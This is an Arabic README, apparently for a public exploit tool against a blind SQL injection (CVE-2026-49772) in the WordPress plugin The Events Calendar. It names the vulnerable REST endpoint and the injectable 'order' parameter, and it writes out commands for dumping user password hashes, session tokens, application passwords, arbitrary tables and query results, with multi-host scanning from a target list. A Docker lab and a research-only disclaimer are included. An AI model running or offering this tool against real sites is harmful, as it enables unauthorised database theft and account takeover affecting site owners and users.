
استغلال حقن SQL أعمى لثغرة CVE-2026-49772 يستهدف إضافة The Events Calendar في ووردبريس. يستخرج محتويات قاعدة البيانات عبر استعلام منطقي/زمني مع فحص متعدد الخيوط، وتفريغ تجزئات المستخدمين، ودعم استعلامات مخصصة.
CVE-2026-49772 هي حقن SQL أعمى بدون مصادقة في إضافة ووردبريس
The Events Calendar. يسمح مُتحقق معامل REST معطوب (validate_callback
يعيد إغلاقًا بدلاً من التحقق) بوصول معامل order في واجهة REST التجريبية
tec/v1 إلى جملة SQL ORDER BY دون تنقية:
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...
هذه حقنة للقراءة فقط (لا استعلامات متراكبة، لا كتابة، لا مخرجات مباشرة) — لكن يمكن استخراج قاعدة البيانات بالكامل عبر أوراكل منطقي/زمني: هاشات كلمات مرور المستخدمين، رموز الجلسات، كلمات مرور التطبيقات، المفاتيح السرية.
النسخ المتأثرة: The Events Calendar 6.15.12 – 6.16.2 (أُصلحت في 6.16.3)
الخطورة: CVSS 3.1 9.3 حرجة — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — كشف غير إتلافي: نطاق REST، إصدار الإضافة، تأكيد قائم على الزمن--recon — بصمة قاعدة البيانات: الإصدار، المستخدم الحالي، قاعدة البيانات، نظام التشغيل، الصلاحيات، بادئة الجداول--users — تفريغ wp_users: أسماء الدخول، البريد الإلكتروني، هاشات كلمات المرور--user-meta — تفريغ wp_usermeta: رموز الجلسات، كلمات مرور التطبيقات، الصلاحيات--get-table — تفريغ أي جدول مع اكتشاف تلقائي للأعمدة--query — استخراج نتيجة أي SELECT عددي (scalar)مكتبة Python 3 القياسية فقط — requirements.txt مضمّن لسير العمل المعتاد لكنه لا يثبّت أي شيء إضافي.
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <target> <action> [options]
اختر إجراءً واحدًا فقط: --check، --recon، --users، --user-meta،
--get-table <TABLE>، --query <SQL>. شغّل --help لمعرفة جميع الخيارات.
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
الضبط: --technique boolean|time، --delay، --threads، --rows، --prefix،
--where، -useragent، -timeout. افحص العديد من المضيفين باستخدام -l targets.txt.
مختبر Docker Compose مستقل بذاته يحوي الإضافة الهشّة (مضمّنة، ولا تُنزَّل عند الإقلاع) وأحداثًا مُعدّة مسبقًا. انظر docker/DOCKER.md.
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ عند جدار الحماية / الخادم الوسيط (WAF / reverse proxy)هذه الأداة مقدمة للأغراض التعليمية والبحثية فقط. استخدمها فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.